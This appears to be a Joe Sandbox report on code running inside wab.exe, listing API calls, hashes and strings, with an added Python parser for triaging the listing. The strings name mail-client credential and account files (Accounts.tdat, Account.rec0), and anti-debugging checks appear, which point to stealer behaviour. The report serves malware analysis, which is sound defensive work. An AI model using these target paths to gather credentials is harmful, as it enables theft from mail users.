                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,3563924F,?,00000000,?,00000000,?,35639276,?,00000007,?,?,35637E5A,?), ref: 35635734
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,3563924F,?,00000000,?,00000000,?,35639276,?,00000007,?,?,35637E5A,?,?), ref: 35635746
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                                                                                                      • Opcode ID: c7af81995f870ecaa34d8a6a240de64aadf5ed89ac6e6c6a2b7fc3852966a667
                                                                                                                                                                                                                      • Instruction ID: 4922e005fa339af5e19d627b89db458d61bf42f1b761f52e270e068f8161a551
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7af81995f870ecaa34d8a6a240de64aadf5ed89ac6e6c6a2b7fc3852966a667
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28E08C72605208BBEB211FB0E889B893BB9BB40AD0F910464F60CAB470DB308482C7D8
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 35632645
                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 35632710
                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 35632730
                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 3563273A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                                                                                                      • Opcode ID: c0033614e5134e28565c94b14cb315833073dd453d5bdf503cdf2b2e6c20c2bc
                                                                                                                                                                                                                      • Instruction ID: b29c4cba04fdb274e6b31ccc32469c225d1c0e5944be6e4279fc61d48190e8d9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0033614e5134e28565c94b14cb315833073dd453d5bdf503cdf2b2e6c20c2bc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3312A75D4621C9BDB11DFA4D989BCDBBB8BF08340F1040EAE40DAB260EB709A85CF45
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 35632276
• GetCurrentThreadId.KERNEL32 ref: 35632285
• GetCurrentProcessId.KERNEL32 ref: 3563228E
• QueryPerformanceCounter.KERNEL32(?), ref: 3563229B
Memory Dump Source
• Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
• Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_35630000_wab.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,35632C3B,3563D1DC,00000017), ref: 35632B21
• UnhandledExceptionFilter.KERNEL32(3563D1DC,?,35632C3B,3563D1DC,00000017), ref: 35632B2A
• GetCurrentProcess.KERNEL32(C0000409,?,35632C3B,3563D1DC,00000017), ref: 35632B35
• TerminateProcess.KERNEL32(00000000,?,35632C3B,3563D1DC,00000017), ref: 35632B3C
Memory Dump Source
• Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
• Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_35630000_wab.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
• String ID:
• API String ID: 3231755760-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 356361DA
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 356361E4
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 356361F1
Memory Dump Source
• Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
• Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_35630000_wab.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(?,?,35634A8A,?,35642238,0000000C,35634BBD,00000000,00000000,00000001,35632082,35642108,0000000C,35631F3A,?), ref: 35634AD5
• TerminateProcess.KERNEL32(00000000,?,35634A8A,?,35642238,0000000C,35634BBD,00000000,00000000,00000001,35632082,35642108,0000000C,35631F3A,?), ref: 35634ADC
• ExitProcess.KERNEL32 ref: 35634AEE
Memory Dump Source
• Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
• Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_35630000_wab.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 3563294C
Memory Dump Source
• Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
• Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_35630000_wab.jbxd
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
• Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_35630000_wab.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 35631D1B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 35631D37
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 35631D4B
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 35631D58
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 35631D72
• CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 35631D7D
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 35631D8A
Memory Dump Source
• Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
• Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_35630000_wab.jbxd
Similarity
• API ID: File$Delete$CloseCopyCreateHandleReadSize
• String ID:
• API String ID: 1454806937-0
• Opcode ID: b53d7496293398022eac4929a13d7a016a608ec821d62646e9fdbffc35887270
• Instruction ID: 325af38005aab5c7e0ea992119b7b8d6bbc84034c5b5256b1888200ebfe6b918
• Opcode Fuzzy Hash: b53d7496293398022eac4929a13d7a016a608ec821d62646e9fdbffc35887270
• Instruction Fuzzy Hash: FA215EB194221CBFE7109FA09C8DEEB76BCEB09798F4105A5F501E2160DB709E868B70
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
• Rendered graph not reproduced. Basic blocks 356339be-35633a80; calls shown in the graph: LoadLibraryExW (356339ea, 35633a38), GetLastError (35633a05), FreeLibrary (35633a60), and the internal function 356355f6 (35633a10, 35633a24).
Strings
Memory Dump Source
• Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
• Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_35630000_wab.jbxd
Similarity
• API ID:
• String ID: api-ms-$ext-ms-
• API String ID: 0-537541572
• Opcode ID: c7ca436706f0a349382267c1b0af32f3643ba5c86cb802b7770fc78468cb070f
• Instruction ID: 97ad11077fb751bed0b5b64cd7881bab38c7409fb5e379671ded36aea56dc314
• Opcode Fuzzy Hash: c7ca436706f0a349382267c1b0af32f3643ba5c86cb802b7770fc78468cb070f
• Instruction Fuzzy Hash: 7811B776B07315FBE7119A68DC86E0A3768AF81BE0F590150E816B76B1EF70D901C6E1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• lstrcatW.KERNEL32(?,?), ref: 35631038
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 3563104B
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 35631061
• lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 35631075
• GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 35631090
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 356310B8
Memory Dump Source
• Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
• Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_35630000_wab.jbxd
Similarity
• API ID: lstrlen$AttributesFilelstrcat
• String ID:
• API String ID: 3594823470-0
• Opcode ID: a10d8edd026210500139a31b76f64a45b68cdd5c5671fbebcff1c418ba39118b
• Instruction ID: 54375331e2c4297a46fc0b0521266bc8c4ba2eb26e23fc5400c6f7f5b86e6359
• Opcode Fuzzy Hash: a10d8edd026210500139a31b76f64a45b68cdd5c5671fbebcff1c418ba39118b
• Instruction Fuzzy Hash: AC217F7590135CABCF10DE60DC49EDB3779EF44254F104296E869971B1DF309A86CB51
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 35631E89: lstrlenW.KERNEL32(?,?,?,?,?,356310DF,?,?,?,00000000), ref: 35631E9A
  • Part of subcall function 35631E89: lstrcatW.KERNEL32(?,?), ref: 35631EAC
  • Part of subcall function 35631E89: lstrlenW.KERNEL32(?,?,356310DF,?,?,?,00000000), ref: 35631EB3
  • Part of subcall function 35631E89: lstrlenW.KERNEL32(?,?,356310DF,?,?,?,00000000), ref: 35631EC8
  • Part of subcall function 35631E89: lstrcatW.KERNEL32(?,356310DF), ref: 35631ED3
• GetFileAttributesW.KERNEL32(?,?,?,?), ref: 3563122A
Strings
Memory Dump Source
• Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
• Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_35630000_wab.jbxd
Similarity
• API ID: lstrlen$lstrcat$AttributesFile
• String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
• API String ID: 1475205934-1520055953
• Opcode ID: f99f7fba3b17cfdd29146b001efa70b1451ac7fa2b3c942f23c10e32b2f03d32
• Instruction ID: 9111016cd6016c34735aa51dada6c5887313937dcd7f3d89af50463ad74a5be5
• Opcode Fuzzy Hash: f99f7fba3b17cfdd29146b001efa70b1451ac7fa2b3c942f23c10e32b2f03d32
• Instruction Fuzzy Hash: 552191B9A502486AEB2097A0EC82FEE7339EF80B14F000556F605EB1E0EBB15D85C75D
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
• Rendered graph not reproduced. Basic blocks 35634b39-35634ba2; calls shown in the graph: GetModuleHandleExW (35634b39), GetProcAddress (35634b63), FreeLibrary (35634b8c), and the internal function 35632ada (35634b95).
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,35634AEA,?,?,35634A8A,?,35642238,0000000C,35634BBD,00000000,00000000), ref: 35634B59
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 35634B6C
• FreeLibrary.KERNEL32(00000000,?,?,?,35634AEA,?,?,35634A8A,?,35642238,0000000C,35634BBD,00000000,00000000,00000001,35632082), ref: 35634B8F
Strings
Memory Dump Source
• Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
• Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_35630000_wab.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 6386883c01d8744840ba936c82ff491fd6f1adc1a4edb021b6fb1f27e44cfba8
• Instruction ID: e4b4d5afd01fca3377d77e7d860a0c45b36fddc6ef71f5162c000395a156d235
• Opcode Fuzzy Hash: 6386883c01d8744840ba936c82ff491fd6f1adc1a4edb021b6fb1f27e44cfba8
• Instruction Fuzzy Hash: 19F0A47191510CBBCB019F60D809F9DBFB9EF04791F410194F806A2161DF318942CA51
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,35639C07,?,00000000,?,00000000,00000000), ref: 356394D4
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 35639590
• WriteFile.KERNEL32(?,?,00000000,35639C07,00000000,?,?,?,?,?,?,?,?,?,35639C07,?), ref: 356395AF
• WriteFile.KERNEL32(?,?,00000001,35639C07,00000000,?,?,?,?,?,?,?,?,?,35639C07,?), ref: 356395E8
Memory Dump Source
• Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
• Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_35630000_wab.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleMultiWide
• String ID:
• API String ID: 977765425-0
• Opcode ID: dfc495e0f4a05e0c50276159c60a8cd426c3fac46ef9fa998f0b8fcd2fa1f587
• Instruction ID: b4f1be552389875ef74053b7e2b58a3115f039da27a29eef7dfe3eeb1d898fb6
• Opcode Fuzzy Hash: dfc495e0f4a05e0c50276159c60a8cd426c3fac46ef9fa998f0b8fcd2fa1f587
• Instruction Fuzzy Hash: 3951C7B1A05209AFDB00CFA4DC92ADEBBF4FF09310F10411AE952E72A1DB709981CF51
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(?,?,?,?,?,356310DF,?,?,?,00000000), ref: 35631E9A
• lstrcatW.KERNEL32(?,?), ref: 35631EAC
• lstrlenW.KERNEL32(?,?,356310DF,?,?,?,00000000), ref: 35631EB3
• lstrlenW.KERNEL32(?,?,356310DF,?,?,?,00000000), ref: 35631EC8
• lstrcatW.KERNEL32(?,356310DF), ref: 35631ED3
Memory Dump Source
• Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
• Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_35630000_wab.jbxd
Similarity
• API ID: lstrlen$lstrcat
• String ID:
• API String ID: 493641738-0
• Opcode ID: 9f0719d337c041fe16cdc5a9c96d7ca69143ee0deaed95d5e20f009784213225
• Instruction ID: 01d4a0f2396572d2f7344dda6e26b1a76dadd12f00eb65a35e7823876ad6816d
• Opcode Fuzzy Hash: 9f0719d337c041fe16cdc5a9c96d7ca69143ee0deaed95d5e20f009784213225
• Instruction Fuzzy Hash: AEF0892A1151147AD7212B29AC85E7F777CFFC5BA0F440019F508931A19B555853D2B6
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,3563190E,?,?,00000000,?,00000000), ref: 35631643
• lstrcatW.KERNEL32(?,?), ref: 3563165A
• lstrlenW.KERNEL32(?,?,?,?,?,3563190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 35631661
• lstrcatW.KERNEL32(00001008,?), ref: 35631686
Memory Dump Source
• Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
• Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_35630000_wab.jbxd
Similarity
• API ID: lstrcatlstrlen
• String ID:
• API String ID: 1475610065-0
• Opcode ID: 2380694c8e76a7332ff43ba67a41137c2febcc22080701f36efb31524be9f873
• Instruction ID: 9116f4ecc348279194b6c8bf34bc78f48b67c0292b9a957861423d34733a4ffb
• Opcode Fuzzy Hash: 2380694c8e76a7332ff43ba67a41137c2febcc22080701f36efb31524be9f873
• Instruction Fuzzy Hash: F521FC36A05204BBD704DF64EC85EEE77B8EF88720F14406BE504EB191EF34A542C7A9
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32 ref: 3563715C
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 3563717F
  • Part of subcall function 356356D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 35635702
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 356371A5
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 356371C7
Memory Dump Source
• Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
• Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_35630000_wab.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
• String ID:
• API String ID: 1794362364-0
• Opcode ID: 5efed1a7d15105573d0cefa3bd9b8f3161dec0910cf8b78d1d6286152d4df6f8
• Instruction ID: b23f6cc913ada01464ef7b2cc7777c4209923e25d70ae978814aea4daa7b3f72
• Opcode Fuzzy Hash: 5efed1a7d15105573d0cefa3bd9b8f3161dec0910cf8b78d1d6286152d4df6f8
• Instruction Fuzzy Hash: 4301D8B7A1B6197B23110AB69C89C7B6A7DEEC2DA13550169BC06D7220DF608D02C5B5
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,35631D66,00000000,00000000,?,35635C88,35631D66,00000000,00000000,00000000,?,35635E85,00000006,FlsSetValue), ref: 35635D13
• GetLastError.KERNEL32(?,35635C88,35631D66,00000000,00000000,00000000,?,35635E85,00000006,FlsSetValue,3563E190,FlsSetValue,00000000,00000364,?,35635BC8), ref: 35635D1F
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,35635C88,35631D66,00000000,00000000,00000000,?,35635E85,00000006,FlsSetValue,3563E190,FlsSetValue,00000000), ref: 35635D2D
Memory Dump Source
• Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
• Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_35630000_wab.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: d75bfaf758f12f47b204d90992423a832c610937eac4f68ba7ce4ee3bafaca27
• Instruction ID: ae58017e0c810177bad41147fe5cba059d4ce2a499ef3a3360401f0722bb8e47
• Opcode Fuzzy Hash: d75bfaf758f12f47b204d90992423a832c610937eac4f68ba7ce4ee3bafaca27
• Instruction Fuzzy Hash: 9701FC766273267BD3124E68DC9DE463768FF15BE1B510A20F906E7561DF20D402CBE4
Uniqueness

Uniqueness Score: -1.00%
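The function entries above list each resolved call as `Api.MODULE(args), ref: address`, with `?` for an argument the Joe Sandbox IDA plugin could not recover statically and `Part of subcall function` for calls one level down. The entry just above is worth reading as a sequence rather than as isolated calls: LoadLibraryExW with dwFlags 0x800 (LOAD_LIBRARY_SEARCH_SYSTEM32), then GetLastError, then LoadLibraryExW again with dwFlags 0, which is the try-System32-only-first-then-fall-back-to-the-default-search-order idiom; the FlsSetValue string in the arguments is consistent with a runtime resolving that export. The following Python is an added example (not part of the Joe Sandbox report or its plugin) of a small parser for this listing format that turns the lines into structured calls and applies two triage heuristics: flagging LoadLibraryExW loads that are restricted to System32 versus fall-back loads with the default search order, and flagging lstrcatW, which concatenates without a destination bound. The sample input is constructed from API lines that appear in the entries on this page; the heuristics and the `ApiCall` type are this example's own, not the tool's.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple, Union

# Constructed sample: API lines copied from the function entries on this page.
# The mix of lines from different entries is deliberate so that each parser
# branch (no-argument call, subcall line, string argument) is exercised.
SAMPLE_APIS = """\
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,35631D66,00000000,00000000,?,35635C88), ref: 35635D13
• GetLastError.KERNEL32(?,35635C88,35631D66,00000000,00000000,00000000,?,35635E85,00000006,FlsSetValue), ref: 35635D1F
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,35635C88,35631D66,00000000), ref: 35635D2D
• GetEnvironmentStringsW.KERNEL32 ref: 3563715C
  • Part of subcall function 356356D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 35635702
• lstrcatW.KERNEL32(00001008,?), ref: 35631686
"""

# Documented Windows constant: dwFlags value of LoadLibraryExW that restricts
# the search to %windir%\System32.
LOAD_LIBRARY_SEARCH_SYSTEM32 = 0x00000800

# One API line of the listing: optional subcall prefix, Api.MODULE, optional
# parenthesised argument list, then the call-site address after "ref:".
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

Arg = Union[int, str, None]  # hex value, string literal, or unrecoverable ('?')


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: int                        # call-site address inside the dump
    subcall_of: Optional[int] = None  # address of the callee this line belongs to


def parse_args(text: Optional[str]) -> List[Arg]:
    """Split the plugin's argument list: '?' -> None, 8 hex digits -> int, else literal."""
    if text is None:
        return []
    out: List[Arg] = []
    for tok in text.split(","):
        tok = tok.strip()
        if tok == "?":
            out.append(None)
        elif re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
            out.append(int(tok, 16))
        else:
            out.append(tok)  # e.g. FlsSetValue, an export name passed as a string
    return out


def parse_api_block(text: str) -> List[ApiCall]:
    """Parse every API line of an 'APIs' block; non-matching lines are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        sub = m.group("sub")
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("mod"),
            args=parse_args(m.group("args")),
            ref=int(m.group("ref"), 16),
            subcall_of=int(sub, 16) if sub else None,
        ))
    return calls


def find_findings(calls: List[ApiCall]) -> List[Tuple[int, str]]:
    """Heuristic triage over the call sequence; returns (call-site, message) pairs."""
    findings: List[Tuple[int, str]] = []
    for i, c in enumerate(calls):
        if c.api == "LoadLibraryExW" and len(c.args) >= 3 and c.args[2] is not None:
            flags = c.args[2]
            if flags & LOAD_LIBRARY_SEARCH_SYSTEM32:
                findings.append((c.ref, "LoadLibraryExW restricted to System32 (0x800)"))
            elif flags == 0 and any(p.api == "GetLastError" for p in calls[max(0, i - 2):i]):
                # Zero flags right after GetLastError: the fallback branch taken when
                # the 0x800 flag is rejected, so the default DLL search order applies.
                findings.append((c.ref, "fallback LoadLibraryExW with default search order"))
        if c.api in ("lstrcatW", "lstrcatA"):
            findings.append((c.ref, "unbounded string concatenation"))
    return findings


if __name__ == "__main__":
    for ref, msg in find_findings(parse_api_block(SAMPLE_APIS)):
        print(f"{ref:08X}: {msg}")
```

A `?` argument means the plugin could not resolve the value, so any heuristic keyed on an argument must treat `None` as unknown rather than as zero; the LoadLibraryExW check above only fires when dwFlags was actually recovered. The findings are starting points for a manual look at the call sites, not verdicts.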

APIs
• GetOEMCP.KERNEL32(00000000,?,?,35636C7C,?), ref: 35636A1E
• GetACP.KERNEL32(00000000,?,?,35636C7C,?), ref: 35636A35
Strings
Memory Dump Source
• Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
• Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_35630000_wab.jbxd
Similarity
• API ID:
• String ID: |lc5
                                                                                                                                                                                                                      • API String ID: 0-1493372475
                                                                                                                                                                                                                      • Opcode ID: 77ff6e0d633d34a013badcf8a27c28c35a13df163460f1665e15d9b64afe42bb
                                                                                                                                                                                                                      • Instruction ID: 45636ba591e570ef1446390baf460e57a391dbc7d1f94b9a804efa41ca56ebfc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77ff6e0d633d34a013badcf8a27c28c35a13df163460f1665e15d9b64afe42bb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7F0AF7051520CABE740DFA8D449B6C3770BF40335FA04344E9389A6E1DF714886CB81
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:7.1%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:9.1%
                                                                                                                                                                                                                      Signature Coverage:1.1%
                                                                                                                                                                                                                      Total number of Nodes:2000
